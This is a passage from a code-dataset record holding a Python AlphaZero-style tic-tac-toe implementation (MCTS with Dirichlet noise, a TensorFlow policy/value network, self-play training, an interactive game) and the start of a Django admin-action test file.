0)\n\n p_vec_leaf, v_leaf = f_theta.predict(sess, state_repr_batch, valid_actions_mask_batch)\n\n p_vec_leaf = p_vec_leaf[0, :]\n v_leaf = v_leaf[0, 0]\n\n p_vec_leaf = p_vec_leaf[d_i_inverse]\n\n return p_vec_leaf, v_leaf\n\n\ndef get_me_a_tree(state):\n tree = Node(s=state, is_root=True)\n p_vec_leaf, v_leaf = tree.predict_value_and_prior_vec_for_leaf_node(sess, f_theta)\n tree.Pas_vec = p_vec_leaf\n tree.Vs = v_leaf\n\n eps = 0.25\n\n #alpha = 0.03 # for go\n alpha = 1.21 # for tictactoe\n\n # per the deepmind alphazero paper, alpha is scaled in inverse proportion to avg num legal moves: \n # so for go's alpha to be alpha = 0.03, we have 0.03 = c * 1/(362/2) for some c,\n # and thus c = 0.03 * (362/2), \n # so that for tictactoe, alpha is approximately [0.03 * (362/2)] / (9/2) ~= 1.21\n\n num_valid_actions = np.sum(tree.valid_actions_mask_vec)\n boolean_valid_actions_mask = np.reshape(np.array(tree.valid_actions_mask_vec, dtype=np.bool), [9])\n\n idxs_for_all_actions_within_space_of_all_actions = np.arange(9)\n idxs_for_valid_actions_within_space_of_all_actions = idxs_for_all_actions_within_space_of_all_actions[boolean_valid_actions_mask]\n\n alpha_vec = alpha * np.ones(shape=(num_valid_actions,))\n\n dirichlet_noise_within_space_of_valid_actions = np.random.dirichlet(alpha_vec)\n dirichlet_noise_for_valid_actions_within_space_of_all_actions = np.zeros(dtype=np.float32, shape=(9,))\n dirichlet_noise_for_valid_actions_within_space_of_all_actions[idxs_for_valid_actions_within_space_of_all_actions] = dirichlet_noise_within_space_of_valid_actions\n\n tree.Pas_vec = eps * dirichlet_noise_for_valid_actions_within_space_of_all_actions + (1. - eps) * tree.Pas_vec\n\n return tree\n\n\ndef run_me_a_simulation(tree, sess, f_theta):\n node = tree\n c_puct = np.sqrt(2.0)\n\n # search til we reach a leaf or a terminal node\n while not node.is_leaf_node and not node.is_terminal_node:\n Pas_vec = node.Pas_vec\n Qas_vec = node.Qas_vec\n Nas_vec = node.Nas_vec\n n = float(node.n)\n Uas_vec = c_puct * Pas_vec * (np.sqrt(n) * np.ones(dtype=np.float32, shape=Nas_vec.shape) / (1 + Nas_vec))\n decision_vec = Qas_vec + Uas_vec\n\n mask = np.reshape(np.array(node.valid_actions_mask_vec, dtype=np.bool), [9])\n idx_for_selected_action_within_space_of_valid_actions = np.argmax(np.squeeze(decision_vec, [0])[mask])\n\n idxs_for_all_actions_within_space_of_all_actions = np.arange(9)\n idxs_for_valid_actions_within_space_of_all_actions = idxs_for_all_actions_within_space_of_all_actions[mask]\n idx_for_selected_action_within_space_of_all_actions = idxs_for_valid_actions_within_space_of_all_actions[idx_for_selected_action_within_space_of_valid_actions]\n\n a = idx_for_selected_action_within_space_of_all_actions\n\n # action a leads to leaf node\n if node.child_nodes[a] is None:\n\n # compute leaf node state\n cloned_env = node.s.clone()\n cloned_env.step(move=(a // 3, a % 3), player_id=cloned_env.state.turn_parity.sign)\n\n # construct leaf node\n new_node = Node(s=cloned_env, parent_node_and_prev_action=(node, a))\n\n # attach leaf node to current node\n node.child_nodes[a] = new_node\n\n node = new_node\n else:\n node = node.child_nodes[a]\n\n # if its a leaf node that isnt a terminal state, use the neural network to fill in the value and prior\n if node.is_leaf_node and not node.is_terminal_node:\n p_vec_leaf, v_leaf = node.predict_value_and_prior_vec_for_leaf_node(sess, f_theta)\n node.Pas_vec = p_vec_leaf\n node.Vs = v_leaf\n\n # if it's a terminal state we've never visited before, use the actual outcome for the value\n elif node.is_terminal_node and node.Vs is None:\n v_leaf = node.get_value_for_terminal_node()\n node.Vs = v_leaf\n\n # if it's a terminal node whose value was computed on a previous simulation\n else:\n v_leaf = node.Vs\n\n sign = -1.0\n\n # backtrack and update the action values\n while node.has_parent_node:\n parent_node = node.parent_node\n a = node.prev_action\n\n N = parent_node.Nas_vec[a]\n\n parent_node.Nas_vec[a] += 1\n parent_node.n += 1\n parent_node.Was_vec[a] += sign * v_leaf\n parent_node.Qas_vec[a] = parent_node.Was_vec[a] / float(parent_node.Nas_vec[a])\n\n node = parent_node\n\n sign *= -1.0\n\n return node\n\n\n\ndef run_me_the_mcts(tree, sess, f_theta, num_sims, t):\n # t denotes the move number of the move currently being decided.\n # when computing pi_t, the alphago zero people use tau = 1.0 early in game, and use a low temperature parameter tau for the later moves in the game.\n # for now, we will stick with tau = 1.0 the whole game, but having t as an argument in this function makes this functionality easy to change, if we so wish.\n\n if t == 0:\n tau = 1.0\n else:\n tau = 0.33\n\n for sim in range(0,num_sims):\n tree = run_me_a_simulation(tree, sess, f_theta)\n\n pi_t = np.power(tree.Nas_vec, (1.0/tau)) / np.sum(np.power(tree.Nas_vec, (1.0/tau)), keepdims=True)\n\n return tree, pi_t\n\ndef choose_a_move(pi_t):\n a_t = np.random.choice(9, None, p=pi_t)\n return a_t\n\ndef set_new_root(tree, a_t, sess, f_theta):\n if tree.child_nodes[a_t] is None:\n cloned_env = tree.s.clone()\n cloned_env.step(move=(a // 3, a % 3), player_id=cloned_env.state.turn_parity.sign)\n\n # construct leaf node\n new_node = Node(s=cloned_env, parent_node_and_prev_action=(tree, a_t))\n\n p_vec_leaf, v_leaf = new_node.predict_value_and_prior_vec_for_leaf_node(sess, f_theta)\n new_node.Pas_vec = p_vec_leaf\n new_node.Vs = v_leaf\n\n # attach leaf node to current node\n tree.child_nodes[a_t] = new_node\n\n tree = tree.child_nodes[a_t]\n tree.is_root = True\n tree.parent_node = None\n tree.prev_action = None\n eps = 0.25\n\n #alpha = 0.03 # for go\n alpha = 1.21 # for tictactoe\n\n # per the deepmind alphazero paper, alpha is scaled in inverse proportion to avg num legal moves: \n # so for go's alpha to be alpha = 0.03, we have 0.03 = c * 1/(362/2) for some c,\n # and thus c = 0.03 * (362/2), \n # so that for tictactoe, alpha is approximately [0.03 * (362/2)] / (9/2) ~= 1.21\n\n num_valid_actions = np.sum(tree.valid_actions_mask_vec)\n boolean_valid_actions_mask = np.reshape(np.array(tree.valid_actions_mask_vec, dtype=np.bool), [9])\n\n idxs_for_all_actions_within_space_of_all_actions = np.arange(9)\n idxs_for_valid_actions_within_space_of_all_actions = idxs_for_all_actions_within_space_of_all_actions[boolean_valid_actions_mask]\n\n alpha_vec = alpha * np.ones(shape=(num_valid_actions,))\n\n dirichlet_noise_within_space_of_valid_actions = np.random.dirichlet(alpha_vec)\n dirichlet_noise_for_valid_actions_within_space_of_all_actions = np.zeros(dtype=np.float32, shape=(9,))\n dirichlet_noise_for_valid_actions_within_space_of_all_actions[idxs_for_valid_actions_within_space_of_all_actions] = dirichlet_noise_within_space_of_valid_actions\n\n tree.Pas_vec = eps * dirichlet_noise_for_valid_actions_within_space_of_all_actions + (1. - eps) * tree.Pas_vec\n return tree\n\n\n# in progress\ndef run_me_a_game(sess, f_theta, num_sims=100, debug=False):\n game = TicTacToe()\n tree = get_me_a_tree(game)\n train_log = []\n game_log = []\n debug_log = []\n t = 0\n\n reward = None\n\n while True:\n s_t = game.clone()\n valid_t = tree.valid_actions_mask_vec\n\n tree, pi_t = run_me_the_mcts(tree, sess, f_theta, num_sims=num_sims, t=t)\n\n Vs = tree.Vs\n Pas_vec = tree.Pas_vec\n Qas_vec = tree.Qas_vec\n Nas_vec = tree.Nas_vec\n\n a_t = choose_a_move(pi_t)\n tree = set_new_root(tree, a_t, sess, f_theta)\n\n train_log.append((s_t, valid_t, pi_t))\n game_log.append((s_t, a_t))\n\n s_tp1, reward, episode_done = game.step(move=(a_t // 3, a_t % 3), player_id=game.state.turn_parity.sign)\n\n if debug:\n debug_log.append({\n 't': t,\n 's_t': s_t, \n 'Vs': Vs, \n 'valid_t': valid_t, \n 'Pas_vec': Pas_vec, \n 'Qas_vec': Qas_vec, \n 'Nas_vec': Nas_vec, \n 'pi_t': pi_t, \n 'a_t': a_t,\n 'r_t': reward,\n 'episode_done': episode_done})\n\n t += 1\n\n if episode_done:\n #print('episode done')\n game_log.append((s_tp1, 'game over'))\n break\n\n train_log.reverse()\n train_log = [(tuple_[0], tuple_[1], tuple_[2], ((-1.0) ** i) * reward) for i, tuple_ in enumerate(train_log, 0)]\n train_log.reverse()\n return train_log, game_log, debug_log\n\n\n\nclass NeuralNetwork:\n def __init__(self):\n self.state = tf.placeholder(tf.int32, [None, 3, 3])\n self.valid_actions_mask = tf.placeholder(tf.int32, [None, 9])\n self.pi = tf.placeholder(tf.float32, [None, 9])\n self.z = tf.placeholder(tf.float32, [None, 1])\n self.is_train = tf.placeholder(tf.bool, [])\n self.lr = tf.placeholder(tf.float32, [])\n\n with tf.variable_scope('nn'):\n board = tf.expand_dims(tf.cast(self.state, dtype=tf.float32), -1)\n\n channel_dim = 16\n\n ## residual tower\n # conv block\n conv1 = tf.layers.conv2d(board, filters=channel_dim, kernel_size=[2,2], strides=[1,1], padding='VALID', activation=None)\n conv2 = tf.layers.conv2d(board, filters=channel_dim, kernel_size=[3,1], strides=[1,1], padding='VALID', activation=None)\n conv3 = tf.layers.conv2d(board, filters=channel_dim, kernel_size=[1,3], strides=[1,1], padding='VALID', activation=None)\n flat1 = tf.reshape(conv1, [-1, 2*2*channel_dim])\n flat2 = tf.reshape(conv2, [-1, 1*3*channel_dim])\n flat3 = tf.reshape(conv3, [-1, 3*1*channel_dim])\n flat4 = tf.reshape(board, [-1, 9])\n concat1 = tf.concat([flat1, flat2, flat3, flat4], axis=1)\n elu1 = tf.nn.elu(concat1)\n\n fc2 = tf.layers.dense(elu1, units=(10*channel_dim+9), activation=None)\n elu2 = tf.nn.elu(fc2)\n fc3 = tf.layers.dense(elu2, units=(10*channel_dim+9), activation=None)\n elu3 = tf.nn.elu(fc3)\n res1 = elu1 + elu3\n\n shared_features = res1\n\n ## policy head\n policy_fc1 = tf.layers.dense(shared_features, units=(10*channel_dim), activation=None)\n policy_elu1 = tf.nn.elu(policy_fc1)\n policy_fc2 = tf.layers.dense(policy_elu1, units=(10*channel_dim), activation=None)\n policy_elu2 = tf.nn.elu(policy_fc2)\n policy_fc3 = tf.layers.dense(policy_elu2, 9, activation=None)\n logits = policy_fc3\n\n softmax_terms = tf.cast(self.valid_actions_mask, dtype=tf.float32) * tf.exp(logits)\n self.probabilities = softmax_terms / tf.reduce_sum(softmax_terms, axis=1, keep_dims=True)\n\n ## value head\n value_fc1 = tf.layers.dense(shared_features, units=(2*channel_dim), activation=None)\n value_elu1 = tf.nn.relu(value_fc1)\n value_fc2 = tf.layers.dense(value_elu1, units=(2*channel_dim), activation=None)\n value_elu2 = tf.nn.relu(value_fc2)\n value_fc3 = tf.layers.dense(value_elu2, units=1, activation=None)\n value_tanh = tf.nn.tanh(value_fc3)\n\n self.value = value_tanh\n\n self.mse_terms = tf.squeeze(tf.square(self.z - self.value), [1])\n self.cross_entropy_terms = -tf.reduce_sum(self.pi * tf.log(self.probabilities + 1e-8), axis=1)\n\n self.mse = tf.reduce_mean(self.mse_terms, axis=0)\n self.cross_entropy = tf.reduce_mean(self.cross_entropy_terms, axis=0)\n\n self.loss = self.mse + self.cross_entropy\n self.optimizer = tf.train.MomentumOptimizer(self.lr, momentum=0.9)\n tvars = tf.trainable_variables()\n gradients, _ = zip(*self.optimizer.compute_gradients(loss=self.loss, var_list=tvars))\n gradients, _ = tf.clip_by_global_norm(gradients, 5.0)\n self.train_op = self.optimizer.apply_gradients(zip(gradients, tvars))\n\n def predict(self, sess, state, valid_actions_mask):\n feed_dict = {\n self.state: state,\n self.valid_actions_mask: valid_actions_mask,\n self.is_train: False\n }\n p_theta, v_theta = sess.run([self.probabilities, self.value], feed_dict=feed_dict)\n return p_theta, v_theta\n\n def train(self, sess, state, valid_actions_mask, pi, z, lr):\n feed_dict = {\n self.state: state,\n self.valid_actions_mask: valid_actions_mask,\n self.pi: pi,\n self.z: z,\n self.is_train: True,\n self.lr: lr\n }\n _, loss, mse, cross_entropy = sess.run([self.train_op, self.loss, self.mse, self.cross_entropy], feed_dict=feed_dict)\n return loss, mse, cross_entropy\n\n\nf_theta = NeuralNetwork()\n\ngame.reset()\n\ninit_op = tf.global_variables_initializer()\nsess = tf.Session()\n\nsess.run(init_op)\n\n# tree = get_me_a_tree(game)\n# tree, pi_t = run_me_the_mcts(tree, sess, f_theta, num_sims=1000)\n\ntrain_log_before, game_log_before, debug_log_before = run_me_a_game(sess, f_theta, num_sims=100, debug=True)\n\n\ndef training_step(sess, f_theta, lr, num_games=256, batch_size=64, num_sims=100, gradient_steps=1, verbose=False):\n train_log_combined = []\n for _ in range(0, num_games):\n train_log, _, _ = run_me_a_game(sess, f_theta, num_sims=num_sims)\n train_log_combined.extend(train_log)\n\n shuffle(train_log_combined)\n\n for i in range(0, (len(train_log_combined) - (len(train_log_combined) % batch_size)) // batch_size):\n state_batch = []\n valid_actions_mask_batch = []\n pi_batch = []\n z_batch = []\n\n for j in range(0, batch_size):\n if verbose:\n print('i,j: {},{}'.format(i, j))\n row = train_log_combined[batch_size * i + j]\n s_t, valid_t, pi_t, z_t = row[0], row[1], row[2], row[3]\n\n state_repr_t = s_t.state.board * s_t.state.turn_parity.sign\n \n state_batch.append(state_repr_t)\n valid_actions_mask_batch.append(valid_t)\n pi_batch.append(pi_t)\n z_batch.append([z_t])\n\n state_batch = np.array(state_batch)\n valid_actions_mask_batch = np.array(valid_actions_mask_batch)\n pi_batch = np.array(pi_batch)\n z_batch = np.array(z_batch)\n\n loss, mse, cross_entropy = f_theta.train(sess, state_batch, valid_actions_mask_batch, pi_batch, z_batch, lr)\n\n print('loss: {}... mse: {}... cross_entropy: {}'.format(loss, mse, cross_entropy))\n\n if i == gradient_steps - 1:\n break\n\n\ndef training_loop(sess, f_theta, mode='basic'):\n settings = {\n 'debug': {\n 'steps': [1, 1, 1],\n 'games': 64,\n 'sims': 20\n },\n 'basic': {\n 'steps': [20, 10, 10],\n 'games': 256,\n 'sims': 100\n },\n 'standard': {\n 'steps': [100, 50, 50],\n 'games': 256,\n 'sims': 100\n }\n }\n i1, i2, i3 = settings[mode]['steps']\n num_games = settings[mode]['games']\n num_sims = settings[mode]['sims']\n\n for _ in range(0, i1):\n training_step(sess, f_theta, lr=0.01, num_games=num_games, num_sims=num_sims)\n for _ in range(0, i2):\n training_step(sess, f_theta, lr=0.001, num_games=num_games, num_sims=num_sims)\n for _ in range(0, i3):\n training_step(sess, f_theta, lr=0.0001, num_games=num_games, num_sims=num_sims)\n\n\n\n\n\ndef play_me_a_game(sess, f_theta, num_sims=100, human_player_id=None):\n assert human_player_id is None or human_player_id in [-1, 1]\n if human_player_id is None:\n coin_toss = np.random.randint(2)\n called_it = input(\"coin toss for the first move. call it 0 or 1.\\n> \")\n time.sleep(3)\n print('\\n')\n\n if int(called_it) == coin_toss:\n human_player_id = 1\n remark = ', you called it right!'\n else:\n human_player_id = -1\n remark = '...'\n \n print('coin toss was {}{}\\n'.format(coin_toss, remark))\n print('you play as {}'.format(human_player_id))\n time.sleep(2)\n\n print('player 1 goes first.')\n time.sleep(1)\n\n game = TicTacToe()\n tree = get_me_a_tree(game)\n\n episode_done = False\n\n t = 0\n\n while not episode_done:\n\n if game.state.turn_parity.sign == human_player_id:\n print('_____________\\nnew turn.\\n')\n print(game)\n move = input(\"\\nit's your turn. where would you like to go? enter a tuple (i,j)\\n> \")\n move = move.strip()\n time.sleep(2)\n\n if move == 'q' or move == 'quit' or move == 'Q':\n print('human has quit the game.')\n break\n\n if len(move) == 0:\n print('input does not conform with required format for a move.')\n continue\n\n if move[0] != '(' or move[-1] != ')':\n print('input does not conform with required format for a move.')\n continue\n\n coords = move[1:-1].strip('\\n').strip(' ').split(',')\n coords = [str(s.strip(' ')) for s in coords]\n if len(coords) != 2:\n print('input does not conform with required format for a move.')\n continue\n\n coord0 = coords[0]\n coord1 = coords[1]\n bool0 = coord0 in [str(i) for i in range(0,3)]\n bool1 = coord1 in [str(i) for i in range(0,3)]\n if not bool0 or not bool1:\n print('input coordinates not in valid coordinate set.')\n continue\n\n move = (int(coord0), int(coord1))\n\n if not game.move_is_valid(move=move, player_id=game.state.turn_parity.sign):\n print('move is not valid!')\n continue\n\n # in current implementation, the bot is gonna run some simulations every turn, even if it's the human's move.\n # because, why not increase our visitation counts?\n tree, pi_t = run_me_the_mcts(tree, sess, f_theta, num_sims=num_sims, t=t)\n a_t = 3 * move[0] + move[1]\n tree = set_new_root(tree, a_t, sess, f_theta)\n\n else:\n print('_____________\\nnew turn.\\n')\n print(game)\n print(\"\\nit's the bot's turn. where will it go?\")\n\n tree, pi_t = run_me_the_mcts(tree, sess, f_theta, num_sims=num_sims, t=t)\n a_t = choose_a_move(pi_t)\n tree = set_new_root(tree, a_t, sess, f_theta)\n\n print('the bot played at ({},{}).\\n'.format(a_t // 3, a_t % 3))\n time.sleep(3)\n\n t += 1\n\n s_tp1, reward, episode_done = game.step(move=(a_t // 3, a_t % 3), player_id=game.state.turn_parity.sign)\n if episode_done:\n time.sleep(3)\n print('_____________\\ngame over.\\n')\n print(game)\n print('\\n')\n print('thanks for the game.')\n print('good game.')\n print('\\n')\n break\n\n\nmode_selector = 'standard'\ntraining_loop(sess, f_theta, mode=mode_selector)\n\ntrain_log_after, game_log_after, debug_log_after = run_me_a_game(sess, f_theta, num_sims=1000, debug=True)\n\n\n#play_me_a_game(sess, f_theta, num_sims=1600)\n", "sub_path": "mcts_tictactoe.py", "file_name": "mcts_tictactoe.py", "file_ext": "py", "file_size_in_byte": 29280, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "collections.namedtuple", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 28, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 106, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 125, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 216, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 216, "usage_type": "attribute"}, {"api_name": "numpy.squeeze", "line_number": 236, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 236, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 237, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 237, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 238, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 238, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 239, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 239, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 240, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 240, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 250, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 250, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 253, "usage_type": "attribute"}, {"api_name": "numpy.reshape", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 259, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 293, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 296, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 325, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 326, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 326, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 326, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 328, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 331, "usage_type": "call"}, {"api_name": "numpy.random.dirichlet", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 333, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 334, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 334, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 344, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 352, "usage_type": "attribute"}, {"api_name": "numpy.reshape", "line_number": 355, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 355, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 355, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 356, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 356, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 358, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 431, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 431, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 436, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 436, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 468, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 469, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 469, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 469, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 471, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 474, "usage_type": "call"}, {"api_name": "numpy.random.dirichlet", "line_number": 476, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 476, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 477, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 477, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 544, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 544, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 545, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 545, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 546, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 546, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 547, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 547, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 548, "usage_type": "call"}, {"api_name": "tensorflow.bool", "line_number": 548, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 549, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 549, "usage_type": "attribute"}, {"api_name": "tensorflow.variable_scope", "line_number": 551, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 552, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 552, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 552, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 558, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 558, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 559, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 559, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 560, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 560, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 561, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 562, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 563, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 564, "usage_type": "call"}, {"api_name": "tensorflow.concat", "line_number": 565, "usage_type": "call"}, {"api_name": "tensorflow.nn.elu", "line_number": 566, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 566, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.dense", "line_number": 568, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 568, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.elu", "line_number": 569, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 569, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.dense", "line_number": 570, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 570, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.elu", "line_number": 571, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 571, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.dense", "line_number": 577, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 577, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.elu", "line_number": 578, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 578, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.dense", "line_number": 579, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 579, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.elu", "line_number": 580, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 580, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.dense", "line_number": 581, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 581, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 584, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 584, "usage_type": "attribute"}, {"api_name": "tensorflow.exp", "line_number": 584, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 585, "usage_type": "call"}, {"api_name": "tensorflow.layers.dense", "line_number": 588, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 588, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 589, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 589, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.dense", "line_number": 590, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 590, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 591, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 591, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.dense", "line_number": 592, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 592, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.tanh", "line_number": 593, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 593, "usage_type": "attribute"}, {"api_name": "tensorflow.squeeze", "line_number": 597, "usage_type": "call"}, {"api_name": "tensorflow.square", "line_number": 597, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 598, "usage_type": "call"}, {"api_name": "tensorflow.log", "line_number": 598, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 600, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 601, "usage_type": "call"}, {"api_name": "tensorflow.train.MomentumOptimizer", "line_number": 604, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 604, "usage_type": "attribute"}, {"api_name": "tensorflow.trainable_variables", "line_number": 605, "usage_type": "call"}, {"api_name": "tensorflow.clip_by_global_norm", "line_number": 607, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 636, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 637, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 653, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 674, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 675, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 676, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 677, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 723, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 723, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 725, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 737, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 740, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 756, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 806, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 812, "usage_type": "call"}]} +{"seq_id": "323645953", "text": "from django.conf import settings\nfrom django.conf.urls import patterns, include\nfrom django.contrib.admin import AdminSite\nfrom django.core.exceptions import PermissionDenied\nfrom django.test import TestCase\nfrom publish.actions import delete_selected\nfrom publish.admin import PublishableAdmin\nfrom publish.tests.example_app.models import FlatPage\n\n\nclass TestDeleteSelected(TestCase):\n def setUp(self):\n super(TestDeleteSelected, self).setUp()\n self.fp1 = FlatPage.objects.create(url='/fp1', title='FP1')\n self.fp2 = FlatPage.objects.create(url='/fp2', title='FP2')\n self.fp3 = FlatPage.objects.create(url='/fp3', title='FP3')\n\n self.fp1.publish()\n self.fp2.publish()\n self.fp3.publish()\n\n self.admin_site = AdminSite('Test Admin')\n self.page_admin = PublishableAdmin(FlatPage, self.admin_site)\n\n # override urls, so reverse works\n settings.ROOT_URLCONF = patterns(\n '',\n ('^admin/',\n include(self.admin_site.urls)),\n 